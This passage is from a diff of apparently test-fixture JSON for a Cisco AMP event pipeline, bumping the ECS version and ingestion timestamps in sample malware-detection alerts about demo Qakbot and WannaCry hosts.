ha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1513,7 +1513,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1533,7 +1533,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094048415Z",
+                "ingested": "2021-09-13T18:07:42.929497150Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1588,7 +1588,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1608,7 +1608,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094050302Z",
+                "ingested": "2021-09-13T18:07:42.929499044Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1663,7 +1663,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1683,7 +1683,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094052189Z",
+                "ingested": "2021-09-13T18:07:42.929500941Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1736,7 +1736,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1760,7 +1760,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094054051Z",
+                "ingested": "2021-09-13T18:07:42.929502829Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1815,7 +1815,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1839,7 +1839,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094055941Z",
+                "ingested": "2021-09-13T18:07:42.929504723Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1896,7 +1896,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1922,7 +1922,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094057915Z",
+                "ingested": "2021-09-13T18:07:42.929506709Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1982,7 +1982,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2002,7 +2002,7 @@
             },
             "event": {
                 "severity": 4,
-                "ingested": "2021-09-12T17:32:10.094059796Z",
+                "ingested": "2021-09-13T18:07:42.929508583Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T14:09:00.000Z",
@@ -2061,7 +2061,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2081,7 +2081,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094061712Z",
+                "ingested": "2021-09-13T18:07:42.929510470Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -2136,7 +2136,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2162,7 +2162,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094063595Z",
+                "ingested": "2021-09-13T18:07:42.929512347Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2217,7 +2217,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2241,7 +2241,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094065501Z",
+                "ingested": "2021-09-13T18:07:42.929514264Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2294,7 +2294,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2314,7 +2314,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094067388Z",
+                "ingested": "2021-09-13T18:07:42.929516156Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2373,7 +2373,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2405,7 +2405,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094069286Z",
+                "ingested": "2021-09-13T18:07:42.929518075Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2469,7 +2469,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2499,7 +2499,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094071156Z",
+                "ingested": "2021-09-13T18:07:42.929519988Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2560,7 +2560,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2588,7 +2588,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094073050Z",
+                "ingested": "2021-09-13T18:07:42.929521872Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2654,7 +2654,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2686,7 +2686,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094074914Z",
+                "ingested": "2021-09-13T18:07:42.929523775Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 